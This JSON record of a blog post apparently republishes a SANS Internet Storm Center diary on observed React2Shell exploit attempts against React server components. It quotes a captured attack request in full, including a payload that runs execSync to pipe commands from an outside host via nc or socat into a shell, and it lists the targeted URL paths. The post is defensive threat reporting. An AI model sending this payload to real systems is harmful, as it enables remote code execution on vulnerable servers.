{"id":167,"date":"2025-12-19T09:15:07","date_gmt":"2025-12-19T09:15:07","guid":{"rendered":"https:\/\/blog.ibvl.in\/index.php\/2025\/12\/19\/maybe-a-little-bit-more-interesting-react2shell-exploit-wed-dec-17th\/"},"modified":"2025-12-19T09:15:07","modified_gmt":"2025-12-19T09:15:07","slug":"maybe-a-little-bit-more-interesting-react2shell-exploit-wed-dec-17th","status":"publish","type":"post","link":"https:\/\/blog.ibvl.in\/index.php\/2025\/12\/19\/maybe-a-little-bit-more-interesting-react2shell-exploit-wed-dec-17th\/","title":{"rendered":"Maybe a Little Bit More Interesting React2Shell Exploit, (Wed, Dec 17th)"},"content":{"rendered":"<div>\n<p>I have already talked about various React2Shell exploit attempts we have observed in the last weeks. But new varieties of the exploit are popping up, and the most recent one is using this particular version of the exploit:<\/p>\n<blockquote>\n<p><code>POST \/app HTTP\/1.1<br \/>\nHost: 81.187.66.58<br \/>\nContent-Type: multipart\/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW<br \/>\nNext-Action: 0<br \/>\nRsc-Action: 0<br \/>\nContent-Length: 388<br \/>\nUser-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/120.0.0.0 Safari\/537.36<br \/>\nAccept: *\/*<br \/>\nConnection: close<\/code><\/p>\n<p><code>------WebKitFormBoundary7MA4YWxkTrZu0gW<br \/>\nContent-Disposition: form-data; name=\"$RSC\"<br \/>\nContent-Type: application\/json<\/code><\/p>\n<p><code>{\"0\":{\"0\":{\"0\":{\"constructor\":{\"constructor\":{\"constructor\":\"function() { const {execSync} = require('child_process'); return execSync('n(nc 45.153.34.201 65050||socat - tcp:45.153.34.201:65050)|shn').toString(); }\"}}}}}}<br \/>\n------WebKitFormBoundary7MA4YWxkTrZu0gW--<\/code><\/p>\n<\/blockquote>\n<p>The overall idea is similar to what we have seen in the past. This version adds the &#8220;Rsc-Action&#8221; header, which I assume is supposed to target sites that expose react server components without Next.js. The &#8220;Next-Action&#8221; header is still present as well. The scans are also attempting different URLs:<\/p>\n<blockquote>\n<p><tt>\/<br \/>\n\/api<br \/>\n\/app<br \/>\n\/api\/route<br \/>\n\/_next\/server<\/tt><\/p>\n<\/blockquote>\n<p>\nOther exploits have focused on the index page (\/). I assume the pool of vulnerable systems is running dry, and attackers are diversifying their exploits a bit. Sadly, the host providing instructions for what to do next (45.153.34.201) is no longer providing these instructions.<\/p>\n<p>&#8212;<br \/>\nJohannes B. Ullrich, Ph.D. , Dean of Research, <a href=\"https:\/\/sans.edu\/\">SANS.edu<\/a><br \/>\n<a href=\"https:\/\/jbu.me\/164\">Twitter<\/a>|<\/p>\n<p>\u00a0<\/p>\n<p>&#8212;<br \/>\nJohannes B. Ullrich, Ph.D. , Dean of Research, <a href=\"https:\/\/sans.edu\/\">SANS.edu<\/a><br \/>\n<a href=\"https:\/\/jbu.me\/164\">Twitter<\/a>|<\/p>\n<p> (c) SANS Internet Storm Center. https:\/\/isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.<\/p><\/div>\n","protected":false},"excerpt":{"rendered":"<p>I have already talked about various React2Shell exploit attempts we have observed in the last weeks. But new varieties of the exploit are popping up, and the most recent one is using this particular version of the exploit: POST \/app HTTP\/1.1 Host: 81.187.66.58 Content-Type: multipart\/form-data; boundary=&#8212;-WebKitFormBoundary7MA4YWxkTrZu0gW Next-Action: 0 Rsc-Action: 0 Content-Length: 388 User-Agent: Mozilla\/5.0 (Windows [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"site-container-style":"default","site-container-layout":"default","site-sidebar-layout":"default","disable-article-header":"default","disable-site-header":"default","disable-site-footer":"default","disable-content-area-spacing":"default","footnotes":""},"categories":[90],"tags":[91],"class_list":["post-167","post","type-post","status-publish","format-standard","hentry","category-cybersecurity","tag-cybersecurity"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v26.7 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Maybe a Little Bit More Interesting React2Shell Exploit, (Wed, Dec 17th) - Imperative Business Ventures Limited<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/blog.ibvl.in\/index.php\/2025\/12\/19\/maybe-a-little-bit-more-interesting-react2shell-exploit-wed-dec-17th\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Maybe a Little Bit More Interesting React2Shell Exploit, (Wed, Dec 17th) - Imperative Business Ventures Limited\" \/>\n<meta property=\"og:description\" content=\"I have already talked about various React2Shell exploit attempts we have observed in the last weeks. But new varieties of the exploit are popping up, and the most recent one is using this particular version of the exploit: POST \/app HTTP\/1.1 Host: 81.187.66.58 Content-Type: multipart\/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW Next-Action: 0 Rsc-Action: 0 Content-Length: 388 User-Agent: Mozilla\/5.0 (Windows [&hellip;]\" \/>\n<meta property=\"og:url\" content=\"https:\/\/blog.ibvl.in\/index.php\/2025\/12\/19\/maybe-a-little-bit-more-interesting-react2shell-exploit-wed-dec-17th\/\" \/>\n<meta property=\"og:site_name\" content=\"Imperative Business Ventures Limited\" \/>\n<meta property=\"article:published_time\" content=\"2025-12-19T09:15:07+00:00\" \/>\n<meta name=\"author\" content=\"admin\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"admin\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"1 minute\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/blog.ibvl.in\/index.php\/2025\/12\/19\/maybe-a-little-bit-more-interesting-react2shell-exploit-wed-dec-17th\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/blog.ibvl.in\/index.php\/2025\/12\/19\/maybe-a-little-bit-more-interesting-react2shell-exploit-wed-dec-17th\/\"},\"author\":{\"name\":\"admin\",\"@id\":\"https:\/\/blog.ibvl.in\/#\/schema\/person\/55b87b72a56b1bbe9295fe5ef7a20b02\"},\"headline\":\"Maybe a Little Bit More Interesting React2Shell Exploit, (Wed, Dec 17th)\",\"datePublished\":\"2025-12-19T09:15:07+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/blog.ibvl.in\/index.php\/2025\/12\/19\/maybe-a-little-bit-more-interesting-react2shell-exploit-wed-dec-17th\/\"},\"wordCount\":188,\"keywords\":[\"Cybersecurity\"],\"articleSection\":[\"Cybersecurity\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/blog.ibvl.in\/index.php\/2025\/12\/19\/maybe-a-little-bit-more-interesting-react2shell-exploit-wed-dec-17th\/\",\"url\":\"https:\/\/blog.ibvl.in\/index.php\/2025\/12\/19\/maybe-a-little-bit-more-interesting-react2shell-exploit-wed-dec-17th\/\",\"name\":\"Maybe a Little Bit More Interesting React2Shell Exploit, (Wed, Dec 17th) - Imperative Business Ventures Limited\",\"isPartOf\":{\"@id\":\"https:\/\/blog.ibvl.in\/#website\"},\"datePublished\":\"2025-12-19T09:15:07+00:00\",\"author\":{\"@id\":\"https:\/\/blog.ibvl.in\/#\/schema\/person\/55b87b72a56b1bbe9295fe5ef7a20b02\"},\"breadcrumb\":{\"@id\":\"https:\/\/blog.ibvl.in\/index.php\/2025\/12\/19\/maybe-a-little-bit-more-interesting-react2shell-exploit-wed-dec-17th\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/blog.ibvl.in\/index.php\/2025\/12\/19\/maybe-a-little-bit-more-interesting-react2shell-exploit-wed-dec-17th\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/blog.ibvl.in\/index.php\/2025\/12\/19\/maybe-a-little-bit-more-interesting-react2shell-exploit-wed-dec-17th\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/blog.ibvl.in\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Maybe a Little Bit More Interesting React2Shell Exploit, (Wed, Dec 17th)\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/blog.ibvl.in\/#website\",\"url\":\"https:\/\/blog.ibvl.in\/\",\"name\":\"Imperative Business Ventures Limited\",\"description\":\"\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/blog.ibvl.in\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Person\",\"@id\":\"https:\/\/blog.ibvl.in\/#\/schema\/person\/55b87b72a56b1bbe9295fe5ef7a20b02\",\"name\":\"admin\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/blog.ibvl.in\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/4d20b2cd313e4417a599678e950e6fb7d4dfa178a72f2b769335a08aaa615aa9?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/4d20b2cd313e4417a599678e950e6fb7d4dfa178a72f2b769335a08aaa615aa9?s=96&d=mm&r=g\",\"caption\":\"admin\"},\"sameAs\":[\"https:\/\/blog.ibvl.in\"],\"url\":\"https:\/\/blog.ibvl.in\/index.php\/author\/admin_hcbs9yw6\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Maybe a Little Bit More Interesting React2Shell Exploit, (Wed, Dec 17th) - Imperative Business Ventures Limited","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/blog.ibvl.in\/index.php\/2025\/12\/19\/maybe-a-little-bit-more-interesting-react2shell-exploit-wed-dec-17th\/","og_locale":"en_US","og_type":"article","og_title":"Maybe a Little Bit More Interesting React2Shell Exploit, (Wed, Dec 17th) - Imperative Business Ventures Limited","og_description":"I have already talked about various React2Shell exploit attempts we have observed in the last weeks. But new varieties of the exploit are popping up, and the most recent one is using this particular version of the exploit: POST \/app HTTP\/1.1 Host: 81.187.66.58 Content-Type: multipart\/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW Next-Action: 0 Rsc-Action: 0 Content-Length: 388 User-Agent: Mozilla\/5.0 (Windows [&hellip;]","og_url":"https:\/\/blog.ibvl.in\/index.php\/2025\/12\/19\/maybe-a-little-bit-more-interesting-react2shell-exploit-wed-dec-17th\/","og_site_name":"Imperative Business Ventures Limited","article_published_time":"2025-12-19T09:15:07+00:00","author":"admin","twitter_card":"summary_large_image","twitter_misc":{"Written by":"admin","Est. reading time":"1 minute"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/blog.ibvl.in\/index.php\/2025\/12\/19\/maybe-a-little-bit-more-interesting-react2shell-exploit-wed-dec-17th\/#article","isPartOf":{"@id":"https:\/\/blog.ibvl.in\/index.php\/2025\/12\/19\/maybe-a-little-bit-more-interesting-react2shell-exploit-wed-dec-17th\/"},"author":{"name":"admin","@id":"https:\/\/blog.ibvl.in\/#\/schema\/person\/55b87b72a56b1bbe9295fe5ef7a20b02"},"headline":"Maybe a Little Bit More Interesting React2Shell Exploit, (Wed, Dec 17th)","datePublished":"2025-12-19T09:15:07+00:00","mainEntityOfPage":{"@id":"https:\/\/blog.ibvl.in\/index.php\/2025\/12\/19\/maybe-a-little-bit-more-interesting-react2shell-exploit-wed-dec-17th\/"},"wordCount":188,"keywords":["Cybersecurity"],"articleSection":["Cybersecurity"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/blog.ibvl.in\/index.php\/2025\/12\/19\/maybe-a-little-bit-more-interesting-react2shell-exploit-wed-dec-17th\/","url":"https:\/\/blog.ibvl.in\/index.php\/2025\/12\/19\/maybe-a-little-bit-more-interesting-react2shell-exploit-wed-dec-17th\/","name":"Maybe a Little Bit More Interesting React2Shell Exploit, (Wed, Dec 17th) - Imperative Business Ventures Limited","isPartOf":{"@id":"https:\/\/blog.ibvl.in\/#website"},"datePublished":"2025-12-19T09:15:07+00:00","author":{"@id":"https:\/\/blog.ibvl.in\/#\/schema\/person\/55b87b72a56b1bbe9295fe5ef7a20b02"},"breadcrumb":{"@id":"https:\/\/blog.ibvl.in\/index.php\/2025\/12\/19\/maybe-a-little-bit-more-interesting-react2shell-exploit-wed-dec-17th\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/blog.ibvl.in\/index.php\/2025\/12\/19\/maybe-a-little-bit-more-interesting-react2shell-exploit-wed-dec-17th\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/blog.ibvl.in\/index.php\/2025\/12\/19\/maybe-a-little-bit-more-interesting-react2shell-exploit-wed-dec-17th\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/blog.ibvl.in\/"},{"@type":"ListItem","position":2,"name":"Maybe a Little Bit More Interesting React2Shell Exploit, (Wed, Dec 17th)"}]},{"@type":"WebSite","@id":"https:\/\/blog.ibvl.in\/#website","url":"https:\/\/blog.ibvl.in\/","name":"Imperative Business Ventures Limited","description":"","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/blog.ibvl.in\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Person","@id":"https:\/\/blog.ibvl.in\/#\/schema\/person\/55b87b72a56b1bbe9295fe5ef7a20b02","name":"admin","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/blog.ibvl.in\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/4d20b2cd313e4417a599678e950e6fb7d4dfa178a72f2b769335a08aaa615aa9?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/4d20b2cd313e4417a599678e950e6fb7d4dfa178a72f2b769335a08aaa615aa9?s=96&d=mm&r=g","caption":"admin"},"sameAs":["https:\/\/blog.ibvl.in"],"url":"https:\/\/blog.ibvl.in\/index.php\/author\/admin_hcbs9yw6\/"}]}},"_links":{"self":[{"href":"https:\/\/blog.ibvl.in\/index.php\/wp-json\/wp\/v2\/posts\/167","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/blog.ibvl.in\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/blog.ibvl.in\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/blog.ibvl.in\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/blog.ibvl.in\/index.php\/wp-json\/wp\/v2\/comments?post=167"}],"version-history":[{"count":0,"href":"https:\/\/blog.ibvl.in\/index.php\/wp-json\/wp\/v2\/posts\/167\/revisions"}],"wp:attachment":[{"href":"https:\/\/blog.ibvl.in\/index.php\/wp-json\/wp\/v2\/media?parent=167"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/blog.ibvl.in\/index.php\/wp-json\/wp\/v2\/categories?post=167"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/blog.ibvl.in\/index.php\/wp-json\/wp\/v2\/tags?post=167"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}